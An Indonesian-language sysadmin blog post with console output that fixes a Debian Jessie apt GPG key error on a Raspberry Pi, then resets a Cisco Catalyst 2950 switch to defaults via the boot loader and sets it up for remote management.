
# jessie main
deb http://kartolo.sby.datautama.net.id/debian/ jessie main
deb-src http://kartolo.sby.datautama.net.id/debian/ jessie main

# jessie-updates, previously known as 'volatile'
deb http://kartolo.sby.datautama.net.id/debian/ jessie-updates main contrib non-free
deb-src http://kartolo.sby.datautama.net.id/debian/ jessie-updates main contrib non-free

jika menemui error sperti ini misalnya

Fetched 18.4 MB in 2min 44s (112 kB/s)
Reading package lists... Done
W: GPG error: http://kartolo.sby.datautama.net.id jessie-updates InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 8B48AD6246925553 NO_PUBKEY 7638D0442B90D010
W: GPG error: http://kartolo.sby.datautama.net.id jessie Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 8B48AD6246925553 NO_PUBKEY 7638D0442B90D010 NO_PUBKEY CBF8D6FD518E17E1

SOLUSI :

root@raspberrypi:/home/pi# apt-get install debian-archive-keyring
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
debian-archive-keyring
0 upgraded, 1 newly installed, 0 to remove and 265 not upgraded.
Need to get 40.1 kB of archives.
After this operation, 111 kB of additional disk space will be used.
WARNING: The following packages cannot be authenticated!
debian-archive-keyring
Install these packages without verification? [y/N] y
Get:1 http://kartolo.sby.datautama.net.id/debian/ jessie/main debian-archive-keyring all 2014.3 [40.1 kB]
Fetched 40.1 kB in 0s (195 kB/s)
Selecting previously unselected package debian-archive-keyring.
(Reading database ... 30314 files and directories currently installed.)
Preparing to unpack .../debian-archive-keyring_2014.3_all.deb ...
Unpacking debian-archive-keyring (2014.3) ...
Setting up debian-archive-keyring (2014.3) ...

OK, ulangi lagi apt-get update

root@raspberrypi:/home/pi# apt-get update
Ign http://kartolo.sby.datautama.net.id jessie InRelease
Get:1 http://kartolo.sby.datautama.net.id jessie-updates InRelease [142 kB]
Hit http://archive.raspbian.org jessie InRelease
Get:2 http://kartolo.sby.datautama.net.id jessie Release.gpg [2,373 B]
Hit http://kartolo.sby.datautama.net.id jessie Release
Get:3 http://kartolo.sby.datautama.net.id jessie-updates/main Sources [4,092 B]
Get:4 http://kartolo.sby.datautama.net.id jessie-updates/contrib Sources [32 B]
Get:5 http://kartolo.sby.datautama.net.id jessie-updates/non-free Sources [920 B]
Get:6 http://kartolo.sby.datautama.net.id jessie-updates/main armhf Packages [4,620 B]
Hit http://archive.raspbian.org jessie/main Sources
Get:7 http://kartolo.sby.datautama.net.id jessie-updates/contrib armhf Packages [32 B]
Get:8 http://kartolo.sby.datautama.net.id jessie-updates/non-free armhf Packages [516 B]
Get:9 http://kartolo.sby.datautama.net.id jessie-updates/contrib Translation-en [14 B]
Get:10 http://kartolo.sby.datautama.net.id jessie-updates/main Translation-en [3,259 B]
Get:11 http://kartolo.sby.datautama.net.id jessie-updates/non-free Translation-en [496 B]
Hit http://kartolo.sby.datautama.net.id jessie/main Sources
Hit http://kartolo.sby.datautama.net.id jessie/main armhf Packages
Hit http://kartolo.sby.datautama.net.id jessie/main Translation-en
Hit http://archive.raspbian.org jessie/contrib Sources
Hit http://archive.raspbian.org jessie/non-free Sources
Hit http://archive.raspbian.org jessie/rpi Sources
Hit http://archive.raspberrypi.org jessie InRelease
Hit http://archive.raspberrypi.org jessie/main armhf Packages
Hit http://archive.raspberrypi.org jessie/ui armhf Packages
Ign http://archive.raspberrypi.org jessie/main Translation-en_GB
Ign http://archive.raspberrypi.org jessie/main Translation-en
Ign http://archive.raspberrypi.org jessie/ui Translation-en_GB
Ign http://archive.raspberrypi.org jessie/ui Translation-en
Fetched 159 kB in 36s (4,400 B/s)
Reading package lists... Done

Config Catalyst 2950

Pertama tama, siapkan dulu putty atau hyperterminal.

Pada kondisi catalyst mati, tekan tombol mode cisco catalyst, lalu tancapkan kabel power. Lihat pada layar putty apabila sudah booting lepaskan tombol mode. Nanti keluar tampilan seperti berikut ini

C2950 Boot Loader (C2950-HBOOT-M) Version 12.1(11r)EA1, RELEASE SOFTWARE (fc1)
Compiled Mon 22-Jul-02 17:18 by antonino
WS-C2950-24 starting...
Base ethernet MAC Address: 00:0e:d7:91:80:00
Xmodem file system is available.

The system has been interrupted prior to initializing the
flash filesystem. The following commands will initialize
the flash filesystem, and finish loading the operating
system software:

    flash_init
    load_helper
    boot

switch:

switch: load_helper
# untuk menambah perintah yang ter-hiden
switch: flash_init
# inisialisasi flashing
Initializing Flash...
flashfs[0]: 80 files, 3 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 7741440
flashfs[0]: Bytes used: 5402624
flashfs[0]: Bytes available: 2338816
flashfs[0]: flashfs fsck took 7 seconds.
...done initializing flash.
Boot Sector Filesystem (bs:) installed, fsid: 3
Parameter Block Filesystem (pb:) installed, fsid: 4
switch: dir flash:
# untuk melihat isi dari flash
Directory of flash:/

2    -rwx 313       <date>               env_vars
3    -rwx 3097872   <date>               c2950-i6q4l2-mz.121-22.EA4.bin
4    -rwx 2647      <date>               config.text
5    -rwx 1276      <date>               vlan.dat
7    -rwx 110       <date>               info
8    -rwx 5         <date>               private-config.text
9    drwx 2304      <date>               html
84   -rwx 110       <date>               info.ver

2338816 bytes available (5402624 bytes used)
switch: dir flash:
Directory of flash:/

2    -rwx 313       <date>               env_vars
3    -rwx 3097872   <date>               c2950-i6q4l2-mz.121-22.EA4.bin
4    -rwx 2647      <date>               config.text
5    -rwx 1276      <date>               vlan.dat
7    -rwx 110       <date>               info
8    -rwx 5         <date>               private-config.text
9    drwx 2304      <date>               html
84   -rwx 110       <date>               info.ver

2338816 bytes available (5402624 bytes used)
switch: rename flash:config.text flash:config_old.text
# karena config.text dijalankan setelah diflash, maka harus direname config.text ke config_old.text
switch: boot
# untuk melakukan flashing
switch: boot
Loading "flash:c2950-i6q4l2-mz.121-22.EA4.bin"...##############################
File "flash:c2950-i6q4l2-mz.121-22.EA4.bin" uncompressed and installed, entry po
int: 0x80010000
executing...
              Restricted Rights Legend

Use, duplication, or disclosure by the Government is
subject to restrictions as set forth in subparagraph
(c) of the Commercial Computer Software - Restricted
Rights clause at FAR sec. 52.227-19 and subparagraph
(c) (1) (ii) of the Rights in Technical Data and Computer
Software clause at DFARS sec. 252.227-7013.

           cisco Systems, Inc.
           170 West Tasman Drive
           San Jose, California 95134-1706

Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA4, RELEASE SOFTWARE
(fc1)
Copyright (c) 1986-2005 by cisco Systems, Inc.
Compiled Wed 23-Mar-05 15:33 by yenanh
Image text-base: 0x80010000, data-base: 0x80562000

Initializing flashfs...

flashfs[1]: 80 files, 3 directories
flashfs[1]: 0 orphaned files, 0 orph
flashfs[1]: Total bytes: 7741440
flashfs[1]: Bytes used: 5402624
flashfs[1]: Bytes available: 2338816
flashfs[1]: flashfs fsck took 7 seconds.
flashfs[1]: Initialization complete.
Done initializing flashfs.
POST: System Board Test : Passed
POST: Ethernet Controller Test : Passed
ASIC Initialization Passed

POST: FRONT-END LOOPBACK TEST : Passed
cisco WS-C2950-24 (RC32300) processor (revision M0) with 21039K bytes of memory.

Processor board ID FOC0801X0YR
Last reset from system-reset
Running Standard Image
Running Standard Image

32K bytes of flash-simulated non-volatile configuration memory.
Base ethernet MAC Address: 00:0E:D7:91:80:00
Motherboard assembly number: 73-5781-12
Power supply part number: 34-0965-01
Motherboard serial number: FOC080102Y8
Power supply serial number: PHI075000NP
Model revision number: M0
Motherboard revision number: B0
Model number: WS-C2950-24
System serial number: FOC0801X0YR

         --- System Configuration Dialog ---

Would you like to enter the initial configuration dialog? [yes/no]: no
Switch>en
Switch#

Sampai di sini setingan kembali default. Saatnya config agar switch bisa diremote

Switch#conf t
Switch(config)#enable secret passwordhere
Switch(config)#hostname rhx-sw
rhx-sw(config)#exit

Perhatikan passwordhere merupakan password yang nantinya Anda set sendiri.Password itu nantinya digunakan untuk login pertama. Nanti ada password mode admin untuk mengkonfigurasi secara keseluruhan catalyst anda.

rhx-sw# config
rhx-sw(config)#line vty 0 15
rhx-sw(config-line)#password passwordhere
rhx-sw(config-line)#login
rhx-sw(config-line)#exit

line vty 1 15 bermaksud membuat koneksi untuk remote sampai 16 interasksi. Gampangnya bisa diremote 16 putty. Tentu hal ini bisa anda atur berapa yang dikehendaki. Lalu password admin nya anda atur juga.

Nah sekarang membuat IP pada vlan1 (karena default port yang belum terkonfigurasi adalah vlan1) agar bisa diremote.

rhx-sw# conf t
rhx-sw(config)#int vlan 1
rhx-sw(config-if)#ip address 10.10.111.2 255.255.255.252
rhx-sw(config-if)#no sh
rhx-sw(config-if)#ip
00:20:12: %LINK-3-UPDOWN: Interface Vlan1, changed state to up
rhx-sw(config-if)#ip default-gateway 10.10.111.1
rhx-sw(config)# exit

Nanti bisa diremote dengan ip 10.10.111.2
Sampai di sini sudah selesai, namun perhatikan setiap konfigurasi harus anda simpan agar ketika mati listrik dan up kembali maka setingan akan tersimpan

rhx-sw#write memory
00:21:46: %SYS-5-CONFIG_I: Configured from console by console
Building configuration...
[OK]

rhx-sw#copy running-config startup-config
Destination filename [startup-config]?
Building configuration...
[OK]

Selesai :)